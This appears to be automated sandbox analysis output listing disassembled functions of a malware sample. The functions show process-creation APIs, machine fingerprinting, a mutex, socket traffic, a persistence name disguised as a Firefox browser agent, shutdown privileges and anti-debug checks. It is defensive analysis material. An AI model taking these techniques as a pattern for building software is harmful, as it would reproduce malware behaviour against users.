                      • Instruction ID: e7207bf84b130895059a84b2523b5322c37bcd6de563aa576d9d11c7cf199a9a
                      • Opcode Fuzzy Hash: 79ebd2e449dd363d96aeda1d8746ec1eb4e61c02241cd1cbd143227e0dc4ccd8
                      • Instruction Fuzzy Hash: 09B19071A00258AFDF18CFA9CC84BAEBBB5FF48305F1440A9E949EB291E7319D45DB14
                      APIs
                      • StrCmpNIA.SHLWAPI(?,?,00000000), ref: 005E7C7A
                      • wnsprintfA.SHLWAPI ref: 005E7D12
                      • wsprintfA.USER32 ref: 005E7D39
                      • lstrcmpA.KERNEL32(?,Start), ref: 005E7FBB
                      • EnterCriticalSection.KERNEL32(005EA088), ref: 005E8011
                      • GetProcessHeap.KERNEL32(00000008,?), ref: 005E8078
                      • HeapAlloc.KERNEL32(00000000), ref: 005E807F
                      • GetProcessHeap.KERNEL32(00000008,?,?), ref: 005E808A
                      • HeapReAlloc.KERNEL32(00000000), ref: 005E8091
                      • LeaveCriticalSection.KERNEL32(005EA088), ref: 005E80E8
                        • Part of subcall function 005E5FD0: GetModuleHandleW.KERNEL32(ntdll), ref: 005E5FED
                        • Part of subcall function 005E5FD0: GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 005E6001
                        • Part of subcall function 005E5FD0: GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 005E600C
                        • Part of subcall function 005E5FD0: GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 005E6017
                        • Part of subcall function 005E5FD0: GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 005E6022
                        • Part of subcall function 005E5FD0: GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 005E602D
                        • Part of subcall function 005E5FD0: GetTempPathW.KERNEL32(000000F6,?), ref: 005E6046
                        • Part of subcall function 005E5FD0: wnsprintfW.SHLWAPI ref: 005E6081
                        • Part of subcall function 005E5FD0: PathCombineW.SHLWAPI(?,?,?), ref: 005E609B
                        • Part of subcall function 005E5FD0: CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 005E60C2
                        • Part of subcall function 005E5FD0: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005E60E6
                        • Part of subcall function 005E5FD0: SetEndOfFile.KERNEL32(00000000), ref: 005E60E9
                        • Part of subcall function 005E5FD0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005E60F6
                        • Part of subcall function 005E5FD0: wnsprintfW.SHLWAPI ref: 005E6114
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 005E8107
                      • HeapFree.KERNEL32(00000000), ref: 005E810E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AddressProc$File$Processwnsprintf$AllocCriticalPathSection$CombineCreateEnterFreeHandleLeaveModulePointerTempWritelstrcmpwsprintf
                      • String ID: %d|%s|%.16s|$%s|%s$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$Start
                      • API String ID: 851647271-3778496198
                      • Opcode ID: 2c876d91c14b68cd5f48db1d5678879ed42c22b54e3fc62e7c05ba2cbb3b5374
                      • Instruction ID: 7177d6663ae62d436636a1a0c7e007d54a6cd99b9892d4b1437fab88c8475cef
                      • Opcode Fuzzy Hash: 2c876d91c14b68cd5f48db1d5678879ed42c22b54e3fc62e7c05ba2cbb3b5374
                      • Instruction Fuzzy Hash: E6E10671A086DA8FDB2D8F768C8477A7FA6BF99300F1841ADD8C59B242DB309D45C750
                      APIs
                      • InitializeCriticalSection.KERNEL32(005EA088), ref: 005E8732
                        • Part of subcall function 005E71A0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 005E71CA
                        • Part of subcall function 005E71A0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 005E71E6
                        • Part of subcall function 005E71A0: GetProcessHeap.KERNEL32(00000008,?), ref: 005E71F9
                        • Part of subcall function 005E71A0: HeapAlloc.KERNEL32(00000000), ref: 005E7200
                        • Part of subcall function 005E71A0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 005E721D
                        • Part of subcall function 005E71A0: RegCloseKey.ADVAPI32(80000002), ref: 005E7229
                      • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 005E875F
                      • StringFromGUID2.OLE32(?,?,00000080), ref: 005E87B8
                      • wsprintfA.USER32 ref: 005E87CF
                      • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 005E87E3
                      • GetLastError.KERNEL32 ref: 005E87EE
                      • ExitProcess.KERNEL32 ref: 005E88F3
                        • Part of subcall function 005E26A0: GetTickCount.KERNEL32 ref: 005E26A2
                      • WSAStartup.WS2_32(00000202,?), ref: 005E882C
                      • CryptAcquireContextA.ADVAPI32(005EA4F4,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 005E8845
                      • CryptAcquireContextA.ADVAPI32(005EA4F4,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 005E8861
                      • CoInitializeEx.OLE32(00000000,00000000), ref: 005E88AC
                      • ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 005E88C3
                      • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 005E88E2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
                      • String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
                      • API String ID: 267019445-2941900213
                      • Opcode ID: e9f7e2b38d33cb278968a44d803aa095918bce01b58bcef2783568c33a427106
                      • Instruction ID: 338eb5ec96490f97fc2b2a06ccc7f366bccfb87b4925767c0b442fc82c2d892f
                      • Opcode Fuzzy Hash: e9f7e2b38d33cb278968a44d803aa095918bce01b58bcef2783568c33a427106
                      • Instruction Fuzzy Hash: F2410974A40388AFF71CDB61DC8EFAA3B78BB14701F104065F689EE1D1EBB066489B55
                      APIs
                      • inet_pton.WS2_32(00000002,?,?), ref: 005E6430
                      • htons.WS2_32(?), ref: 005E644C
                      • inet_pton.WS2_32(00000002,?,?), ref: 005E645E
                      • htons.WS2_32(?), ref: 005E6465
                      • socket.WS2_32(00000002,00000001,00000006), ref: 005E6478
                      • connect.WS2_32(00000000,?,00000010), ref: 005E6493
                      • socket.WS2_32(00000002,00000001,00000006), ref: 005E64A6
                      • connect.WS2_32(00000000,?,00000010), ref: 005E64BB
                      • closesocket.WS2_32(00000000), ref: 005E64C3
                      • select.WS2_32(00000000,?), ref: 005E64F8
                      • recv.WS2_32(?,?,00000400,00000000), ref: 005E6534
                      • send.WS2_32(00000000,?,00000000,00000000), ref: 005E655A
                      • select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 005E658C
                      • closesocket.WS2_32(00000000), ref: 005E65A6
                      • closesocket.WS2_32(00000000), ref: 005E65AD
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 005E65B9
                      • HeapFree.KERNEL32(00000000), ref: 005E65C0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: closesocket$Heapconnecthtonsinet_ptonselectsocket$FreeProcessrecvsend
                      • String ID:
                      • API String ID: 2202494921-0
                      • Opcode ID: 9931024012ed0778c971a5af3ef71d152553fadbda33881e1e6ce7e4ac3294a1
                      • Instruction ID: 266aaf74e65010d4353f69e47d76bc3d69d594a6e4b8a6b17cdb0bd92378717b
                      • Opcode Fuzzy Hash: 9931024012ed0778c971a5af3ef71d152553fadbda33881e1e6ce7e4ac3294a1
                      • Instruction Fuzzy Hash: AF51C071604344ABE718DF64CC89B6FB7E8BF98765F000A1AF6909B1E1D7B0D905CB62
                      APIs
                      • CryptGenRandom.ADVAPI32(00000020,?), ref: 005E93C8
                        • Part of subcall function 005E2840: GetProcessHeap.KERNEL32(00000008,AAAAAAAB,?,?,?,?,005E9415,00000000), ref: 005E2862
                        • Part of subcall function 005E2840: HeapAlloc.KERNEL32(00000000,?,?,?,?,005E9415,00000000), ref: 005E2869
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E9425
                      • HeapFree.KERNEL32(00000000), ref: 005E942C
                      • wsprintfA.USER32 ref: 005E945F
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E9498
                      • HeapFree.KERNEL32(00000000), ref: 005E949B
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E94A0
                      • HeapFree.KERNEL32(00000000), ref: 005E94A3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$Free$AllocCryptRandomwsprintf
                      • String ID: %d|%s|%s|%s$hhlT6dDn
                      • API String ID: 4113358155-4055814786
                      • Opcode ID: 5678ddc79723eb4466b4c12f9b4af366f9999262d88c13f4ec33ef40578dfd4d
                      • Instruction ID: c8c256624b6ee374c3109611a287527814c3070626c0d2efdd4344e781f29c47
                      • Opcode Fuzzy Hash: 5678ddc79723eb4466b4c12f9b4af366f9999262d88c13f4ec33ef40578dfd4d
                      • Instruction Fuzzy Hash: 1A21C9719003886BEB18A7A19C4EFDF7F6DFF44715F040050F988A71D6EA60A909C7A2
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 005E6C77
                      • CoCreateInstance.OLE32(005E1020,00000000,00000001,005E1000,?), ref: 005E6C94
                      • SysAllocString.OLEAUT32(\Mozilla), ref: 005E6CD4
                      • SysFreeString.OLEAUT32(?), ref: 005E6D0B
                      • SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 005E6D18
                      • SysFreeString.OLEAUT32(00000000), ref: 005E6D2F
                      Strings
                      • Firefox Default Browser Agent 318146B0AF4A39CB, xrefs: 005E6D13
                      • \Mozilla, xrefs: 005E6CCF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: String$AllocFree$CreateInitInstanceVariant
                      • String ID: Firefox Default Browser Agent 318146B0AF4A39CB$\Mozilla
                      • API String ID: 478541636-3211539605
                      • Opcode ID: 3fe5ad5f73a8f9e4585c47dce69e9c974ca4aa4ff8ba82ccff76e1ac0b93f1a2
                      • Instruction ID: c352fc57ba1d842ed611c357c548a04880f111479eba5f24cc186549c097f39a
                      • Opcode Fuzzy Hash: 3fe5ad5f73a8f9e4585c47dce69e9c974ca4aa4ff8ba82ccff76e1ac0b93f1a2
                      • Instruction Fuzzy Hash: 4C319434F00294AFD7089F69CC89B9E7FB8FF59395F004198E985AB251D6309D84CBA1
                      APIs
                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 005E637D
                      • OpenProcessToken.ADVAPI32(00000000), ref: 005E6384
                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 005E6399
                      • CloseHandle.KERNEL32(?), ref: 005E63A6
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 005E63D0
                      • CloseHandle.KERNEL32(?), ref: 005E63DB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseHandleProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                      • String ID: SeShutdownPrivilege
                      • API String ID: 158869116-3733053543
                      • Opcode ID: 1b001b0896a196494da9da9460a267dd92ee7656c23e229c070f51f3eec2c3e2
                      • Instruction ID: e2b7b1a45926c519a28f8455ad7ecc9eb8f3e6c8ab3cce277216bf1f226f947a
                      • Opcode Fuzzy Hash: 1b001b0896a196494da9da9460a267dd92ee7656c23e229c070f51f3eec2c3e2
                      • Instruction Fuzzy Hash: 5E018431A40259ABEB209BE0DD4DBAF7BBDFB14742F100054F944AA190D7705E08A7A1
                      APIs
                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00F099D9
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00F09A54
                      • FindClose.KERNEL32(00000000), ref: 00F09A76
                      • FindClose.KERNEL32(00000000), ref: 00F09A99
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: Find$CloseFile$FirstNext
                      • String ID:
                      • API String ID: 1164774033-0
                      • Opcode ID: 7849bd8f40af7fd6cac011affaabd3e0b8394ee385e992a79c7e09dea1ecf58b
                      • Instruction ID: b2e4219db64f6ef0a20f61b9f4617fec11df4f1ab42e2a28bee25c1cf551c091
                      • Opcode Fuzzy Hash: 7849bd8f40af7fd6cac011affaabd3e0b8394ee385e992a79c7e09dea1ecf58b
                      • Instruction Fuzzy Hash: 9641D971E04519AFDB20DF68DC89AFAB7B9EB85314F008195E405D31C5F7749E84BB60
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00F04E95
                      • IsDebuggerPresent.KERNEL32 ref: 00F04F61
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F04F7A
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00F04F84
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: 228aa8c5db88b8ca21ed509c2b08f7529ceb55ec7fad09d8659d4724db77b89b
                      • Instruction ID: 310b05167c42cf0b2725570761afad5fc11d1f7d933d4ad539fb580254bdc8cf
                      • Opcode Fuzzy Hash: 228aa8c5db88b8ca21ed509c2b08f7529ceb55ec7fad09d8659d4724db77b89b
                      • Instruction Fuzzy Hash: 053118B5D0521D9BDF20DF64DC497CDBBB8AF08300F1041AAE40CAB290E774AB84AF45
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00F077C3
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F077CD
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00F077DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: 12afa4d9db7e57655de6d7f8c09392e0ddf7613bf4fb42083377bd7176bc8f78
                      • Instruction ID: 67aef571791e28afadcec70d448c866b4f69b8321623c2c91d436ef41f3e88d6
                      • Opcode Fuzzy Hash: 12afa4d9db7e57655de6d7f8c09392e0ddf7613bf4fb42083377bd7176bc8f78
                      • Instruction Fuzzy Hash: 1A31C474D0121DABCB21EF24DD897DDBBB8BF08710F5041DAE41CA62A0E774AB85AF44
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0$9{^
                      • API String ID: 0-603026723
                      • Opcode ID: e0f188906904be60f46ede94d7db664411bc3ec97a434f4aaef92715dd7d9c75
                      • Instruction ID: d57dbafe9856e868c762082d54c69037fd46846616c8b4a5a0921cdac01d525a
                      • Opcode Fuzzy Hash: e0f188906904be60f46ede94d7db664411bc3ec97a434f4aaef92715dd7d9c75
                      • Instruction Fuzzy Hash: 9A51C331E183DC8EDB1D8BED98542ECBFB1AF56200F5481BED8D6A7643D5344A09CB61
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F0FBBC,?,?,00000008,?,?,00F0F7BF,00000000), ref: 00F0FDEE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: e8bbdf9dcf0914e648cec97acded9b8815e032c1b737ebb1f438e24bdeeb52f7
                      • Instruction ID: 5056cd22b96d3b34e95464e0275510c5485719ce4347e0e0f1180cf181bbda2a
                      • Opcode Fuzzy Hash: e8bbdf9dcf0914e648cec97acded9b8815e032c1b737ebb1f438e24bdeeb52f7
                      • Instruction Fuzzy Hash: 20B15F32910609DFD725CF28C486B647BE0FF45364F258668E899CF6E2C335E995EB40
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F0513B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: FeaturePresentProcessor
                      • String ID:
                      • API String ID: 2325560087-0
                      • Opcode ID: 0c7c97e1a86806d72a500bce02506a2ed5519d6ede01828d078420266b5cf6d8
                      • Instruction ID: 7072dba46a897375a3ded89bb258ea1a172809b5b35d6b50835a99ac0669b87b
                      • Opcode Fuzzy Hash: 0c7c97e1a86806d72a500bce02506a2ed5519d6ede01828d078420266b5cf6d8
                      • Instruction Fuzzy Hash: 71515DB1E05619CBDB18CF58E9817AEBBF0FB48714F25806AD415EB290D3B4DA40EF50
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: CountTick
                      • String ID:
                      • API String ID: 536389180-0
                      • Opcode ID: 060e678883ae1ae1e3e1dd9b7ef8e553030050d83a2ed3b597fea597c93ef94a
                      • Instruction ID: c4dfd81f387a291bdc21881314b18715311e0d08556b8be6134efcc63387bbbb
                      • Opcode Fuzzy Hash: 060e678883ae1ae1e3e1dd9b7ef8e553030050d83a2ed3b597fea597c93ef94a
                      • Instruction Fuzzy Hash: 0631AE327105808BD70CCF3DECD666577E6F799310B06462AD99ACB2E0EA74B809DB45
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_00005022,00F0482B), ref: 00F0501B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 134a805ecef8f6099b8e80bc239975608c9979a83b81e9131f47057079d2c12a
                      • Instruction ID: ddad56c9ecc93b2e6e33e0f7cfc3f02beb503a18c54f36ede88891cf2b8b74bf
                      • Opcode Fuzzy Hash: 134a805ecef8f6099b8e80bc239975608c9979a83b81e9131f47057079d2c12a
                      • Instruction Fuzzy Hash:
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: 444f81f828a2fe71c3a325bbc08d8b64d4628a9fcde30decefbe3cc668824704
                      • Instruction ID: c8482494d3599db1393996b777e9aed38f400967f6bb23b9ac4006342bfdd94b
                      • Opcode Fuzzy Hash: 444f81f828a2fe71c3a325bbc08d8b64d4628a9fcde30decefbe3cc668824704
                      • Instruction Fuzzy Hash: 77A012306401058F4340CF315A0528935A85600590302C0145005D1020DA3080006F01
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9b5d2beb5bb9b280eeb9f4044084728c6b7e833c8d3f3f0238baefbe539ccc67
                      • Instruction ID: 4aa1a14009a60b66d78b2efcfd414a6725fb52ae7e13dffd4a745cb294eb2b0c
                      • Opcode Fuzzy Hash: 9b5d2beb5bb9b280eeb9f4044084728c6b7e833c8d3f3f0238baefbe539ccc67
                      • Instruction Fuzzy Hash: 86723B348242D98ACB1DEB65D86E6ECBB35BF62300F4411FDD48A13956BF711B89CE60
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
                      • Instruction ID: 30c601da28732d0c86addaa5ccfa9ad3a7112a4d71085d051946d182f3a63628
                      • Opcode Fuzzy Hash: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
                      • Instruction Fuzzy Hash: D95164B1A11A10CFCB68CF2EC591556BBF1BF8C324355896EA98ACB625E334F840CF51

                      Control-flow Graph

                      • Executed
                      • Not Executed
